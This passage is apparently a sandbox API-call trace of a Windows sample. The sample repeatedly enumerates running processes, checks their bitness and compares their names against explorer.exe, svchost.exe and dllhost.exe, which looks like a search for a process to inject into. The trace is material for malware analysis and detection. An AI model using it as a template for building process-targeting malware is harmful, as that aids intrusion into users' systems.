szExeFile="sensors-democrat.exe")) returned 1 [0201.261] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0201.261] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.261] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.261] CloseHandle (hObject=0xec) returned 1 [0201.261] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0201.261] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0201.261] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0201.261] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0201.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0201.262] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.262] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.262] CloseHandle (hObject=0xec) returned 1 [0201.262] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0201.262] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0201.262] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0201.262] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0201.262] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0201.262] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.262] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.262] CloseHandle (hObject=0xec) returned 1 [0201.263] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0201.263] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0201.263] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0201.263] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.263] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0201.263] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0201.264] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0201.264] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0201.264] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0201.265] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0201.265] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0201.265] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0201.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb84) returned 0x0 [0201.266] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.266] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0201.266] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.266] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.266] CloseHandle (hObject=0xec) returned 1 [0201.266] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0201.267] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0201.267] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.267] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.267] CloseHandle (hObject=0xec) returned 1 [0201.267] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0201.358] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0201.358] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.360] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0201.360] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.360] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.360] CloseHandle (hObject=0xec) returned 1 [0201.360] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0201.361] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.361] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0201.361] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.361] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.361] CloseHandle (hObject=0xec) returned 1 [0201.361] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.362] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0201.362] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0201.362] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.362] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.362] CloseHandle (hObject=0xec) returned 1 [0201.362] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0201.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0201.363] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.363] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0201.363] CloseHandle (hObject=0xec) returned 1 [0201.363] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0201.363] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0201.363] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0201.363] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0201.363] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0201.363] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0201.364] CloseHandle (hObject=0xe8) returned 1 [0201.364] Sleep (dwMilliseconds=0x3e8) [0202.398] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0202.400] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0202.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0202.401] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0202.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0202.401] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0202.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0202.402] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.402] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0202.402] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0202.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0202.403] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0202.403] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0202.403] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0202.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0202.404] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0202.404] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0202.404] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0202.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0202.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0202.405] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0202.405] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0202.406] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.406] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0202.406] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0202.407] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.407] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0202.407] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0202.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0202.408] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0202.408] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0202.409] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.409] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0202.409] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0202.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0202.410] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.410] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.410] CloseHandle (hObject=0xec) returned 1 [0202.410] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0202.410] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0202.410] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0202.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0202.411] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.411] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.411] CloseHandle (hObject=0xec) returned 1 [0202.411] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0202.411] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0202.411] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0202.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0202.412] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0202.412] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0202.412] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.412] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.412] CloseHandle (hObject=0xec) returned 1 [0202.412] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0202.412] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0202.413] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0202.413] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0202.413] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0202.413] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.413] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.413] CloseHandle (hObject=0xec) returned 1 [0202.413] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0202.413] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0202.413] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0202.413] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0202.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0202.414] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.414] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.414] CloseHandle (hObject=0xec) returned 1 [0202.414] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0202.414] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0202.414] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0202.414] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0202.414] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0202.414] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.414] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.414] CloseHandle (hObject=0xec) returned 1 [0202.415] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0202.415] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0202.415] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0202.415] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0202.415] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0202.415] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.415] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.415] CloseHandle (hObject=0xec) returned 1 [0202.415] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0202.415] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0202.415] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0202.415] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0202.416] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0202.416] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.416] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0202.416] CloseHandle (hObject=0xec) returned 1 [0202.416] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0202.416] lstrcmpiA 